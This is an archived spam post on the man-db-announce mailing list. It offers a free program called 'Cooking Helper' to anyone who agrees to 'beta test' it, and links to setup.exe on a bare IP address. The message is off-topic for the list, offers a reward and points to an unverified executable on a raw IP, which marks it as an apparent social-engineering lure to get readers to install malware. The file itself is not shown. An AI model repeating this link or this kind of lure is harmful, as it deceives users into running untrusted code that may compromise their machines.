man-db-announce

[Man-db-announce] Helps us out and let us say thanks

From: a_maxcy
Subject: [Man-db-announce] Helps us out and let us say thanks
Date: Tue, 28 Aug 2007 17:22:18 +0000

Would you consider helping us with your opinion of our new program
Cooking Helper

This beta testing will enable us to fine tune the software for public
release. For helping out, you will receive a free edition and 5 years of
updates.

Simply download the software. Try it out for one week. Email us what you
think of it. If you want to participate, just follow the link to our
download site: http://66.25.68.219/setup.exe